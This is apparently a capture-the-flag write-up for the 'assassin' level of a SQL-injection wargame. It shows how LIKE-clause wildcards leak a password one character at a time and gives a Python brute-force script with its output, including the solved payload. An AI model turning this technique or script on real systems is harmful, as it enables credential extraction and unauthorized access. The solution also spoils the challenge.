Skip to main content

assassin

1

We are provided with theSQL query:

SELECT id FROM prob_assassin WHERE pw LIKE '{$_GET[pw]}'

Filter

The code filters out the following characters:

  • Single quotes

Blind SQL Injection

We have to use wildcards to leak out the password.

Wildcard

Pasted image 20240621082037

More specifically, we have to use the (%) wildcard.

If we provide the following URI parameter:

?pw=%

The resultant query becomes:

SELECT id FROM prob_assassin WHERE pw LIKE '%'

2

Since the Hello guest message is printed, we know that the guest user has a lower index than the admin user.

Let's provide the following URI:

?pw=0%

The resultant query becomes:

SELECT id FROM prob_assassin WHERE pw LIKE '0%'

3

The first character of none of the passwords is 0.

We can try other characters moving up to the following:

?pw=9%

The resultant query becomes:

SELECT id FROM prob_assassin WHERE pw LIKE '9%'

4

So the first character of both the admin and guest password is common, being 9.

We can keep on following this method until the Hello admin message is included in the response. That tells us that the password is exclusive to the admin only.

902%

Script

We can automate the entire process using a script.

assassin_script.py
import requests
import urllib.parse
import string

cookies = {'PHPSESSID': 'cih6lj5v0dkr263t42fnn0d7br'}
url = 'https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php'

guest_password = ''
admin_password = ''
searchspace = string.digits + string.ascii_letters
print()

for index in range(1, 9):
  for char in searchspace:
    payload = f"{guest_password}{char}"
    encoded_payload = urllib.parse.quote_plus(payload)
    full_url = f'{url}?pw={encoded_payload}%'

    response = requests.get(full_url, cookies=cookies)

    if ("Hello admin" in response.text):
      admin_password = guest_password + char 
      break
    elif ("Hello guest" in response.text):
      guest_password += char
      print(f'[x] Common character: {char}')
      break

print()
print(f'[x] Distinct character: {char}')
print(f'[!] Extracted password: {admin_password}%')
print(f'[!] Final payload: ?pw={admin_password}%')
$ python .\assassin_script.py

[x] Common character: 9
[x] Common character: 0

[x] Distinct character: 2  
[!] Extracted password: 902%
[!] Final payload: ?pw=902%

If we provide the following URI:

?pw=902%

The resultant query becomes:

SELECT id FROM prob_assassin WHERE pw LIKE '902%'

0